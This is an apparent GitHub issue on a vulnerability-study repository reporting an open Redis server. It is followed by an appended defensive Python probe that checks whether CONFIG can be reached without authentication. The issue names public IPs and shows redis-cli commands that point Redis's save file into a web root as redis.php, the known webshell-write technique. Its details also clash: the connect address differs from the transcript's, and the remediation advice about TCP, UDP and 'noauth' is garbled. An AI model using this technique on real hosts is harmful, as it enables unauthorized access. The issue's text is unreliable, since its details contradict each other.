c0ny1/vulstudy

Misconfigured redis server

zipponnova opened this issue · 0 comments

The Redis instance (1.14.157.192) is accepting anonymous connections on port 6379; you can start enumerating the service after connecting anonymously to:

  1. redis-cli -h 52.9.41.95

In both cases you will have authenticated access to the server and can enumerate anything in it. I am able to enumerate the client list, check the pidfile location, perform remote code execution, and view real-time logs on it.

RCE:
1.14.157.192:6379> config set dir /var/www/html
OK
1.14.157.192:6379> config set dbfilename redis.php
OK
(1.50s)
1.14.157.192:6379> set test ""
OK
(1.30s)
1.14.157.192:6379> save
(error) ERR
(0.52s)
1.14.157.192:6379> bgsave
Background saving started
(1.20s)
1.14.157.192:6379>

The client list exposes the internal servers, but I can only see my IP in it right now; maybe you guys don't connect to this a lot, but still secure it by restricting the port to TCP only and putting noauth in place if UDP is required.
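The check below is an added example, not code from the issue above or from the vulstudy project. It reproduces the reporter's probe (connect without credentials, then reach CONFIG, the primitive the dir/dbfilename write in the transcript depends on) with a minimal RESP2 client on a raw socket, so a defender can confirm or refute the finding without installing redis-cli. TARGET_HOST / TARGET_PORT, the reply parser and the finding labels are all assumptions made here; the issue's own addresses are deliberately not used. A successful CONFIG GET only shows that CONFIG is reachable unauthenticated; it does not by itself prove that a file was written.

```python
import socket
import sys
from typing import Any, List, Optional, Tuple

# Constructed example target (assumption for this illustration, not the host in the issue).
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 6379


class RespError(Exception):
    """A server error reply (RESP '-' line), e.g. NOAUTH or ERR."""

    def __init__(self, message: str) -> None:
        super().__init__(message)
        self.message = message


class Incomplete(Exception):
    """Raised while a reply has not fully arrived yet."""


def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, the wire form redis-cli sends."""
    out = [b"*%d\r\n" % len(args)]
    for a in args:
        raw = a.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(out)


def _parse(buf: bytes) -> Tuple[Any, bytes]:
    """Parse one RESP2 value; return (value, remaining bytes) or raise Incomplete."""
    if not buf:
        raise Incomplete
    nl = buf.find(b"\r\n")
    if nl < 0:
        raise Incomplete
    kind, line, rest = buf[0:1], buf[1:nl].decode(), buf[nl + 2:]
    if kind == b"+":                 # simple string, e.g. +OK / +PONG
        return line, rest
    if kind == b"-":                 # error, returned as a value so callers can classify it
        return RespError(line), rest
    if kind == b":":                 # integer
        return int(line), rest
    if kind == b"$":                 # bulk string; $-1 is a null
        n = int(line)
        if n == -1:
            return None, rest
        if len(rest) < n + 2:
            raise Incomplete
        return rest[:n].decode(), rest[n + 2:]
    if kind == b"*":                 # array; *-1 is a null array
        n = int(line)
        if n == -1:
            return None, rest
        items: List[Any] = []
        for _ in range(n):
            item, rest = _parse(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unsupported RESP type byte {kind!r}")


def parse_reply(buf: bytes) -> Any:
    """Parse a complete reply held in memory (used by the tests and by _read_reply)."""
    return _parse(buf)[0]


def _read_reply(sock: socket.socket) -> Any:
    """Read from the socket until one whole RESP reply can be parsed."""
    buf = b""
    while True:
        try:
            return _parse(buf)[0]
        except Incomplete:
            chunk = sock.recv(4096)
            if not chunk:
                raise ConnectionError("connection closed mid-reply")
            buf += chunk


def assess(ping_reply: Any, config_reply: Any) -> str:
    """Turn the PING and CONFIG GET dir replies into a finding label (labels are this example's own)."""
    if isinstance(ping_reply, RespError):
        # Redis answers every command with -NOAUTH when requirepass is set and no AUTH was sent.
        return "requires-auth" if ping_reply.message.startswith("NOAUTH") else "error"
    if ping_reply != "PONG":
        return "not-redis"
    if isinstance(config_reply, list) and len(config_reply) == 2 and config_reply[0] == "dir":
        # Unauthenticated CONFIG access: the dir/dbfilename write primitive is available.
        return "open-config-reachable"
    if isinstance(config_reply, RespError):
        # Reachable without auth, but CONFIG is renamed or disabled.
        return "open-config-blocked"
    return "open"


def probe(host: str = TARGET_HOST, port: int = TARGET_PORT, timeout: float = 3.0) -> str:
    """Connect without credentials and run the two-command probe against a live server."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(encode_command("PING"))
        ping = _read_reply(s)
        s.sendall(encode_command("CONFIG", "GET", "dir"))
        cfg = _read_reply(s)
    return assess(ping, cfg)


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST
    print(f"{host}:{TARGET_PORT} -> {probe(host)}")
```

Run it as `python3 redis_probe.py <host>` from a network position that can reach the instance. The result a defender wants is `requires-auth` (or a refused connection): that means `requirepass` is set, or the service is bound to a non-public interface, or `protected-mode yes` is in effect. Renaming CONFIG away with `rename-command CONFIG ""` turns the finding into `open-config-blocked`, which removes the write primitive shown in the transcript but still leaves the data readable, so it is a complement to authentication and binding, not a substitute.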